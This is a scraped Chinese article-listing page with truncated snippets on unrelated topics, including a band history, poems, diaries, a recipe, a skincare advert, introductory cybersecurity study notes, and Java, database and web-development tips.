    997年3月29日,“SoBand”乐队正式改名为“MayDay”。1999年,刘冠佑正式加入五月天。发行了第首张录音室专辑《五月天第一张创作专辑》。深受英国摇滚乐队披头士的影响,五月天相信摇滚乐拥有可以改变世界的力量,通过摇滚可以将爱与希望传递到每一个角落。五月天的五个人,都不算多有天资。阿信小时候很喜欢唱歌,但是没有很好的天赋。(快来看陈信宏)他说,在小学的时候,他想加入合唱队,但是只唱了两个
  • 东方红 鼻孔一佳
    历史上的今天,9月9日。毛泽东,伟大的无产阶级革命家。毛泽东(1893年12月26日-1976年9月9日),字润之(原作咏芝,后改润芝),笔名子任。湖南湘潭人。中国人民的领袖,伟大的马克思主义者,伟大的无产阶级革命家、战略家、理论家,中国共产党、中国人民解放军和中华人民共和国的主要缔造者和领导人,马克思主义中国化的伟大开拓者,近代以来中国伟大的爱国者和民族英雄,中国共产党第一代中央领导集体的核心,
  • 虚境朝拾:懂王参加节目秀 2021/07/20 -5 群星璀璨十二时
    虚境朝拾:2021/07/20场景5:懂王参加节目秀梦见懂王访华,带着两个手下。他们准备在杭州的即将开始的娱乐节目前秀一把实力。他们是其中一支参赛队。做足了准备。节目开始前,他们显得有些傲慢。比如懂王举着大瓶矿泉水吨吨吨在喝,喝的面红耳赤。其助手之一名校毕业,笔才惊人,然而因仕其主,而被台下观众们感到惋惜。另一个助手也是懂王的忠实的打手,尽管看上去平平无奇。
  • 自学黑客(网络安全)技术——2024最新 九九归二 web安全安全学习笔记网络网络安全信息安全
    01什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。02怎样规划网络安全如果你是一
  • 什么软件可以改IP地址 bafnpa123 服务器运维
    什么软件可以改IP地址在现代网络环境中,有时候我们需要更换IP地址来进行网络操作。IP地址是网络通信的基石,它标识了计算机在互联网上的唯一身份。下面,我将向您介绍几种常见的换IP地址的方法:方法一:使用深度ip转换器ip转换器是一种可以在公共网络上建立加密通道的技术。通过ip转换器,您可以更换您的IP地址,从而隐藏您的真实IP,提高网络安全性。在选择ip转换器服务时,请务必选择信誉良好、速度稳定的
  • 网络安全(黑客技术)—自学 德西德西 web安全安全网络安全学习python开发语言php
    1.网络安全是什么网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。2.网络安全市场一、是市场需求量高;二、则是发展相对成熟入门比较容易。3.所需要的技术水平需要掌握的知识点偏多(举例):4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国家安全更有为国效力的正义黑客—红客联盟可见其重视
  • 有趣的体育课 李茂旭
    有趣的体育课陈庄镇中心小学四(6)班李茂旭上午第三节是体育课,不知道为什么老师不让拿跳绳,说是谁拿跳绳就宰了谁。我心想“今天老师怎么不让拿跳绳了呢?”到了一看,原来是换体育老师了。老师让我们整好队以后到操场跑步,随后就说“想干嘛就干嘛吧这节课自由活动。”我选择了踢足球,踢着踢着鞋子飞出去了,在飞的过程中,它好像跟我说“主人,我要远走高飞了,再见!”玩着玩着,不一会儿就下课了。真是一节有趣的体育课啊
  • 樱花吟 暮云成璧
    春去春回又一春,春砌琼樱欲销魂。青苞浅道浮香暖,凉蕊羞笑采花人。采花未比游人意,经年此别故人去。半点相思残梦里,几回河绛忆别离。昨夜霜尘冷落花,纤云弄巧月入槎。飞星寄语牛郎岸,冰心未解织女家。踯躅素英凋零处,素英红泥留人住。三月三日三生尽,长恨青冥悠悠诉。推枕复疑夜梦君,暮鼓萧萧花影存。情生暗知他乡雨,轻雷直唤此间人。飘飖举,玉香风,香风梦断是多情。何宵暂醉红笺墨,望尽春光走断鸿。图片发自App
  • 麦吉丽贵妇膏代理多少钱 麦吉丽小芹
    麦吉丽、麦吉丽贵妇膏、麦吉丽代理、麦吉丽素颜三部曲、贵妇膏详细咨询请添加V信:18688885511国内首个拥有完善代理商管理以及培训系统。旗下四十几款产品,涵盖护肤、彩妆、身体护理、问题肌肤修复护理等方面,其中【素颜三部曲】更是因为被人口碑称赞而迅速蹿红朋友圈及各大微博头条!麦吉丽因其天然、安全有效、高品质立足中国高端护肤品市场,线下专柜体验店遍地开花。大半个娱乐圈明星都在用的护肤佳品。麦吉丽贵
  • 网络安全(黑客技术)—2024自学 德西德西 开发语言php安全web安全网络安全python网络
    1.网络安全是什么网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。2.网络安全市场一、是市场需求量高;二、则是发展相对成熟入门比较容易。3.所需要的技术水平需要掌握的知识点偏多(举例):4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国家安全更有为国效力的正义黑客—红客联盟可见其重视
  • 【Hadoop】使用Scala与Spark连接ClickHouse进行数据处理 音乐学家方大刚 ScalaHadoophadoopscalaspark
    风不懂不懂得叶的梦月不听不听闻窗里琴声意难穷水不见不曾见绿消红霜不知不知晓将别人怎道珍重落叶有风才敢做一个会飞的梦孤窗有月才敢登高在夜里从容桃花有水才怕身是客身是客此景不能久TieYann(铁阳)、薄彩生《不知晓》在大数据分析和处理领域,ApacheSpark是一个广泛使用的高性能、通用的计算框架,而ClickHouse作为一个高性能的列式数据库,特别适合在线分析处理(OLAP)。结合Scala语
  • 风光正好,一路“黔”行 ——遵义红色文化之行 红魂立德
    很有幸在遵义红魂立德服务中心参加这次“不忘初心,牢记使命”的遵义红色党建活动,两天的学习,让我深受洗礼,倍感振奋!通过这次革命传统教育,我重温了历史、缅怀了先烈、重温了入党誓词,体味了娄山关战役的悲壮、也为“四渡赤水”拍手叫绝。立于雄关,目收林海,雄关漫道真如铁,而今迈步从头越,共产党人的豪迈和气概已在我的体内升腾,这种红色基因已深深地植入我的灵魂!遵义会议是在红军最危急的时刻召开的,是我们党第一
  • 蓝猴波幅13天觉察记录day2——kin132月亮的黄人 Demi瑶瑶
    感恩今天的开启~洗头了,面膜,感恩,还有什么比这更好的呢~生命的一切都来得轻松愉快并充满荣耀~图片发自App月亮的黄人,水晶的红天行者~图片发自App今日觉察:1.上午6点起了个大早,收拾好居然都快七点了,吃早餐少一张餐券,靖又分享她说话语气和善叫了几句亲爱的对方就松口了,自己虽然没看到,不过也发现了自己当时说话语气情绪化的一面,也有点浮躁,心不够静,还是感恩~早餐吃的也棒棒哒呢~2.上午分享美容
  • 网络安全(黑客)—2024自学笔记 羊村最强沸羊羊 web安全笔记安全网络安全网络python开发语言
    前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。二、怎样规划网络安全如果你
  • 牛年第117练 和乐伯阳
    回归崭新的168,几无不适之感,今日没有借口,就是状态一般,发挥一般。连续两日与百扣柯王单打一小局,均是险胜,说明实力很接近了。今日双打成绩也很一般,与前场红王搭档对抗乔付组合一局被吐槽“太瘦”;吾乔/姬柯五局三胜,18-21,20-22,21-12,21-15,16-13,负局无非是因吾方状态不佳并配合不恰,又因百扣柯王与北规姬雄状态神勇。乔付组合对姬孙组合战绩辉煌,无疑是首医第一混双。
  • 嵊州越剧小镇99㎡:诗画戏曲最为意境美丨森川软装 愚叔yushu
    我欲因之梦吴越,一夜飞度镜湖月。湖月照我影,送我至剡溪。——李白越剧小镇隐逸在嵊州剡溪,此处是女子越剧诞生地,散落着三个自然村落和一条明清古街。无关风月却又风月无边,极具江南灵秀之气。项目将这份越剧古韵引入室内,生动的再现了一幅江南诗意图,踏入房门仿若就成了这画里的人。景致成了调色盘,菊蕾白、合欢红、蝶翅蓝、鹿角棕糅合在一起,轻柔淡雅。雕花门窗外是连绵起伏的黛山,极目望去,颇有人闲桂花落、夜静春山
  • 【1104Day63】复盘翻盘 狸老撕
    [月亮]【今日回顾】001今天干了啥退掉网购的衣服去婆婆家吃饭完成亲子手工作业心理课学习、听书002今日输入/输出了啥剽悍晨读(睡出生产力)(激素的威胁)武志红的心理课《读懂你的人生的脚本》、问答及预习听书《异类》复盘003今天为健康美腻努力了咩?今天休息睡了个傍晚小觉【经验/教训/流程总结】看了一些健身方面的文章,都是说每周运动3~4次最佳,不由地感到自己天天运动有些疲惫,身体和思想上都有点儿累
  • 无题 山中做妖怪
    应该是个雨天天是黑色周围是墨绿我拾起了面又拾起了米黑白花色的狗不再喘息母鸡在雨中走走停停红漆的柜子掉了些残色窗外是忘记收起的杏核你想说这一切都很惬意我说你不懂闷雷带来的恐惧雨声掩埋了生人走过的脚步直到他将野花踩在脚下狗吠开始响起蝴蝶躲在窗沿你询问生人来的路是否蜿蜒他说不幸的是和多人照面于是米饭的香气化成烟到乌云里红漆的残色被鲜血染红至满我将野花捡起来祭奠给陌生人的葬礼
  • 这道菜不求多,一顿只要一小把,口感香辣入味,佐粥下酒样样行! 摩玛食堂
    香辣花生米小鱼干所需食材:小鱼干100克花生1把姜1片大蒜2瓣葱1根花椒1撮红干椒7-8个料酒2汤匙食用油适量烹饪步骤:1.将小鱼干用流动水冲洗两遍,再放入温水中浸泡约半个小时。因为这种鱼干都特别咸,这样处理一下会好很多。2.冷锅冷油放入一把花生米,然后用小火来回翻炒至花生发出噼啪的响声时盛出晾凉。千万别等花生变色了再盛出,这样等晾凉后基本就处于糊掉的状态了。3.准备其他辅料:姜蒜切成碎末,小葱切
  • 007点评:你有被讨厌的勇气吗? 文倩定投人生
    【文章日期】2022年7月28日作业雨️点评我的楼上007-252班❤️战友作者:像青春一样绽放【文章标题】《被讨厌的勇气》笔记【文章链接】此处省略。【我的感悟】亲爱的延宏:见字如面。非常高兴我们能够上下楼!因为能够收到你超级用心的点评,而开心不已^_^【见】你的文章行云流水,一气呵成。让我对这本《被讨厌的勇气》饶有兴致,有点想立马读完这本书的念头。事实上,我在搜索这本书以前,还以为是武志红老师写
  • 个人网络防范 潜※者 网络安全
    目录安全事件频发根源在于背后利益链条不仅仅是中国网络安全事件成国际性难题个人网络信息安全防护四招来帮忙首先,预防第一第二,健康的上网浏览习惯第三,WiFi安全性第四,规范的文件处理黑客攻击无孔不入,钓鱼网站日益频发多发,伪基站不断升级,甚至从不联网的WindowsXP都有可能感染病毒。2016年6月23日,中国五联网协会发布的《2016中国网民权益保护调查报告》显示,从2015年下半年到2016年
  • 雪落着,伞上开着花,伞下开着花 若水诗心张利红
    作者:张利红图片发自App一、雪伞(1)古旧的老街隔开了城市的喧哗一把伞撑开小小的心扉雪落着伞上开着花伞下开着花(2)雪落掩盖了三千繁华伞外没有了世界伞内只有你的笑如雪(3)若即若离似无还有多想扔了这把伞就此白头二、冰挂(1)檐下冰挂屋檐下的冰挂就像人的欲望悬得越高越长就越容易摔得粉身碎骨图片发自App(2)小溪的爱情是春的一滴雨荡起你心里的涟漪你把芳心暗许你在石上叮咚婉转柔情百寄当春变成了夏艳阳
  • 网页有效防止XSS,SQL注入,木马文件拦截上传等安全问题 程序员贵哥 网络安全xsssql安全网络安全web安全php
    网络安全问题一直是备受关注的话题,其中跨站脚本攻击(XSS)、SQL注入和木马文件上传是常见的安全威胁。下面我将详细介绍这些安全问题。首先是跨站脚本攻击(XSS)。XSS攻击是一种利用网站漏洞,将恶意脚本注入到用户浏览器中并执行的攻击方式。攻击者可以在网站中插入恶意脚本,当用户浏览该网站时,恶意脚本会被执行,从而窃取用户的敏感信息或执行其他恶意操作。XSS攻击可以分为反射型、存储型和DOM-bas
  • 桑榆不晚,唯愿夕阳红满天 付强_
    图片发自App昨晚,在车灯的映照下,雨丝飘飘洒洒,打着雨伞,伞面却毫无声息,是不是下雪啦?预报的有雪。天气好冷。时间已是阴历十月的最后一天,农历十月二十九。早起,去看看父亲。买了排骨,藕,鱼,青菜豆腐,还有佐料,去帮他烧顿饭。父亲说,你把菜放那儿吧,我自己弄,我想睡会儿。父亲刚出去过早回来,一般早上过早后睡个回笼觉。父亲一个人住着。在购物中心隔壁,诺大的房子就他一个人,形单影只,母亲三年前走了,客
  • 我眼里的春天,记录百花盛开的场景 玥美洋洋
    图片发自App春天是绚烂多彩的春天阳光明媚,春风送暖草绿了,花开了,心情也朗润起来了图片发自App春天喜在枝头,春天美在心里各种花争芳斗艳,红的白的黄的粉的图片发自App玉兰花,迎春花,紫檀花桃花,杏花,樱花还有各种叫不出名目的花各美其美,美美与共图片发自App花是人间的使者花是幸福的象征花是美好的向往图片发自App用眼睛欣赏用手机拍摄用文字描绘让花开的每一个瞬间都成为永恒定格在这美丽的春天图片发
  • java解析APK 3213213333332132 javaapklinux解析APK
    解析apk有两种方法 1、结合安卓提供apktool工具,用java执行cmd解析命令获取apk信息 2、利用相关jar包里的集成方法解析apk 这里只给出第二种方法,因为第一种方法在linux服务器下会出现不在控制范围之内的结果。 public class ApkUtil { /** * 日志对象 */ private static Logger
  • nginx自定义ip访问N种方法 ronin47 nginx 禁止ip访问
       因业务需要,禁止一部分内网访问接口, 由于前端架了F5,直接用deny或allow是不行的,这是因为直接获取的前端F5的地址。    所以开始思考有哪些主案可以实现这样的需求,目前可实施的是三种:    一:把ip段放在redis里,写一段lua           二:利用geo传递变量,写一段
  • mysql timestamp类型字段的CURRENT_TIMESTAMP与ON UPDATE CURRENT_TIMESTAMP属性 dcj3sjt126com mysql
    timestamp有两个属性,分别是CURRENT_TIMESTAMP 和ON UPDATE CURRENT_TIMESTAMP两种,使用情况分别如下:   1.   CURRENT_TIMESTAMP    当要向数据库执行insert操作时,如果有个timestamp字段属性设为   CURRENT_TIMESTAMP,则无论这
  • struts2+spring+hibernate分页显示 171815164 Hibernate
    分页显示一直是web开发中一大烦琐的难题,传统的网页设计只在一个JSP或者ASP页面中书写所有关于数据库操作的代码,那样做分页可能简单一点,但当把网站分层开发后,分页就比较困难了,下面是我做Spring+Hibernate+Struts2项目时设计的分页代码,与大家分享交流。   1、DAO层接口的设计,在MemberDao接口中定义了如下两个方法: public in
  • 构建自己的Wrapper应用 g21121 rap
            我们已经了解Wrapper的目录结构,下面可是正式利用Wrapper来包装我们自己的应用,这里假设Wrapper的安装目录为:/usr/local/wrapper。           首先,创建项目应用   &nb
  • [简单]工作记录_多线程相关 53873039oycg 多线程
         最近遇到多线程的问题,原来使用异步请求多个接口(n*3次请求)     方案一 使用多线程一次返回数据,最开始是使用5个线程,一个线程顺序请求3个接口,超时终止返回     缺点       测试发现必须3个接
  • 调试jdk中的源码,查看jdk局部变量 程序员是怎么炼成的 jdk 源码
    转自:http://www.douban.com/note/211369821/    学习jdk源码时使用--   学习java最好的办法就是看jdk源代码,面对浩瀚的jdk(光源码就有40M多,比一个大型网站的源码都多)从何入手呢,要是能单步调试跟进到jdk源码里并且能查看其中的局部变量最好了。 可惜的是sun提供的jdk并不能查看运行中的局部变量
  • Oracle RAC Failover 详解 aijuans oracle
    Oracle RAC 同时具备HA(High Availiablity) 和LB(LoadBalance). 而其高可用性的基础就是Failover(故障转移). 它指集群中任何一个节点的故障都不会影响用户的使用,连接到故障节点的用户会被自动转移到健康节点,从用户感受而言, 是感觉不到这种切换。 Oracle 10g RAC 的Failover 可以分为3种: 1. Client-Si
  • form表单提交数据编码方式及tomcat的接受编码方式 antonyup_2006 JavaScripttomcat浏览器互联网servlet
    原帖地址:http://www.iteye.com/topic/266705 form有2中方法把数据提交给服务器,get和post,分别说下吧。 (一)get提交 1.首先说下客户端(浏览器)的form表单用get方法是如何将数据编码后提交给服务器端的吧。    对于get方法来说,都是把数据串联在请求的url后面作为参数,如:http://localhost:
  • JS初学者必知的基础 百合不是茶 js函数js入门基础
    JavaScript是网页的交互语言,实现网页的各种效果, JavaScript 是世界上最流行的脚本语言。 JavaScript 是属于 web 的语言,它适用于 PC、笔记本电脑、平板电脑和移动电话。 JavaScript 被设计为向 HTML 页面增加交互性。 许多 HTML 开发者都不是程序员,但是 JavaScript 却拥有非常简单的语法。几乎每个人都有能力将小的
  • iBatis的分页分析与详解 bijian1013 javaibatis
            分页是操作数据库型系统常遇到的问题。分页实现方法很多,但效率的差异就很大了。iBatis是通过什么方式来实现这个分页的了。查看它的实现部分,发现返回的PaginatedList实际上是个接口,实现这个接口的是PaginatedDataList类的对象,查看PaginatedDataList类发现,每次翻页的时候最
  • 精通Oracle10编程SQL(15)使用对象类型 bijian1013 oracle数据库plsql
    /* *使用对象类型 */ --建立和使用简单对象类型 --对象类型包括对象类型规范和对象类型体两部分。 --建立和使用不包含任何方法的对象类型 CREATE OR REPLACE TYPE person_typ1 as OBJECT( name varchar2(10),gender varchar2(4),birthdate date ); drop type p
  • 【Linux命令二】文本处理命令awk bit1129 linux命令
    awk是Linux用来进行文本处理的命令,在日常工作中,广泛应用于日志分析。awk是一门解释型编程语言,包含变量,数组,循环控制结构,条件控制结构等。它的语法采用类C语言的语法。   awk命令用来做什么? 1.awk适用于具有一定结构的文本行,对其中的列进行提取信息 2.awk可以把当前正在处理的文本行提交给Linux的其它命令处理,然后把直接结构返回给awk 3.awk实际工
  • JAVA(ssh2框架)+Flex实现权限控制方案分析 白糖_ java
      目前项目使用的是Struts2+Hibernate+Spring的架构模式,目前已经有一套针对SSH2的权限系统,运行良好。但是项目有了新需求:在目前系统的基础上使用Flex逐步取代JSP,在取代JSP过程中可能存在Flex与JSP并存的情况,所以权限系统需要进行修改。 【SSH2权限系统的实现机制】 权限控制分为页面和后台两块:不同类型用户的帐号分配的访问权限是不同的,用户使
  • angular.forEach boyitech AngularJSAngularJS APIangular.forEach
    angular.forEach 描述: 循环对obj对象的每个元素调用iterator, obj对象可以是一个Object或一个Array. Iterator函数调用方法: iterator(value, key, obj), 其中obj是被迭代对象,key是obj的property key或者是数组的index,value就是相应的值啦. (此函数不能够迭代继承的属性.)
  • java-谷歌面试题-给定一个排序数组,如何构造一个二叉排序树 bylijinnan 二叉排序树
    import java.util.LinkedList; public class CreateBSTfromSortedArray { /** * 题目:给定一个排序数组,如何构造一个二叉排序树 * 递归 */ public static void main(String[] args) { int[] data = { 1, 2, 3, 4,
  • action执行2次 Chen.H JavaScriptjspXHTMLcssWebwork
    xwork 写道 <action name="userTypeAction" class="com.ekangcount.website.system.view.action.UserTypeAction"> <result name="ssss" type="dispatcher">
  • [时空与能量]逆转时空需要消耗大量能源 comsci 能源
            无论如何,人类始终都想摆脱时间和空间的限制....但是受到质量与能量关系的限制,我们人类在目前和今后很长一段时间内,都无法获得大量廉价的能源来进行时空跨越.....         在进行时空穿梭的实验中,消耗超大规模的能源是必然
  • oracle的正则表达式(regular expression)详细介绍 daizj oracle正则表达式
        正则表达式是很多编程语言中都有的。可惜oracle8i、oracle9i中一直迟迟不肯加入,好在oracle10g中终于增加了期盼已久的正则表达式功能。你可以在oracle10g中使用正则表达式肆意地匹配你想匹配的任何字符串了。 正则表达式中常用到的元数据(metacharacter)如下: ^ 匹配字符串的开头位置。 $ 匹配支付传的结尾位置。 *
  • 报表工具与报表性能的关系 datamachine 报表工具birt报表性能润乾报表
    在选择报表工具时,性能一直是用户关心的指标,但是,报表工具的性能和整个报表系统的性能有多大关系呢? 要回答这个问题,首先要分析一下报表的处理过程包含哪些环节,哪些环节容易出现性能瓶颈,如何优化这些环节。   一、报表处理的一般过程分析 1、用户选择报表输入参数后,报表引擎会根据报表模板和输入参数来解析报表,并将数据计算和读取请求以SQL的方式发送给数据库。   2、
  • 初一上学期难记忆单词背诵第一课 dcj3sjt126com wordenglish
    what 什么  your 你 name 名字 my 我的 am 是 one 一 two 二 three 三 four 四 five 五 class 班级,课   six 六 seven 七 eight 八 nince 九 ten 十 zero 零 how 怎样 old 老的 eleven 十一 twelve 十二 thirteen
  • 我学过和准备学的各种技术 dcj3sjt126com 技术
    语言VB https://msdn.microsoft.com/zh-cn/library/2x7h1hfk.aspxJava http://docs.oracle.com/javase/8/C# https://msdn.microsoft.com/library/vstudioPHP http://php.net/manual/en/Html 
  • struts2中token防止重复提交表单 蕃薯耀 重复提交表单struts2中token
    struts2中token防止重复提交表单   >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年7月12日 11:52:32 星期日 ht
  • 线性查找二维数组 hao3100590 二维数组
    1.算法描述 有序(行有序,列有序,且每行从左至右递增,列从上至下递增)二维数组查找,要求复杂度O(n)   2.使用到的相关知识: 结构体定义和使用,二维数组传递(http://blog.csdn.net/yzhhmhm/article/details/2045816)   3.使用数组名传递 这个的不便之处很明显,一旦确定就是不能设置列值 //使
  • spring security 3中推荐使用BCrypt算法加密密码 jackyrong Spring Security
    spring security 3中推荐使用BCrypt算法加密密码了,以前使用的是md5, Md5PasswordEncoder 和 ShaPasswordEncoder,现在不推荐了,推荐用bcrpt Bcrpt中的salt可以是随机的,比如: int i = 0; while (i < 10) { String password = "1234
  • 学习编程并不难,做到以下几点即可! lampcy javahtml编程语言
    不论你是想自己设计游戏,还是开发iPhone或安卓手机上的应用,还是仅仅为了娱乐,学习编程语言都是一条必经之路。编程语言种类繁多,用途各 异,然而一旦掌握其中之一,其他的也就迎刃而解。作为初学者,你可能要先从Java或HTML开始学,一旦掌握了一门编程语言,你就发挥无穷的想象,开发 各种神奇的软件啦。 1、确定目标 学习编程语言既充满乐趣,又充满挑战。有些花费多年时间学习一门编程语言的大学生到
  • 架构师之mysql----------------用group+inner join,left join ,right join 查重复数据(替代in) nannan408 right join
    1.前言。   如题。 2.代码 (1)单表查重复数据,根据a分组   SELECT m.a,m.b, INNER JOIN (select a,b,COUNT(*) AS rank FROM test.`A` A GROUP BY a HAVING rank>1 )k ON m.a=k.a (2)多表查询 , 使用改为le
  • jQuery选择器小结 VS 节点查找(附css的一些东西) Everyday都不同 jquerycssname选择器追加元素查找节点
    最近做前端页面,频繁用到一些jQuery的选择器,所以特意来总结一下:   测试页面: <html> <head> <script src="jquery-1.7.2.min.js"></script> <script> /*$(function() { $(documen
  • 关于EXT tntxia ext
      ExtJS是一个很不错的Ajax框架,可以用来开发带有华丽外观的富客户端应用,使得我们的b/s应用更加具有活力及生命力。ExtJS是一个用 javascript编写,与后台技术无关的前端ajax框架。因此,可以把ExtJS用在.Net、Java、Php等各种开发语言开发的应用中。       ExtJs最开始基于YUI技术,由开发人员Jack
  • 一个MIT计算机博士对数学的思考 xjnine Math
     在过去的一年中,我一直在数学的海洋中游荡,research进展不多,对于数学世界的阅历算是有了一些长进。为什么要深入数学的世界?作为计算机的学生,我没有任何企图要成为一个数学家。我学习数学的目的,是要想爬上巨人的肩膀,希望站在更高的高度,能把我自己研究的东西看得更深广一些。说起来,我在刚来这个学校的时候,并没有预料到我将会有一个深入数学的旅程。我的导师最初希望我去做的题目,是对appe
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他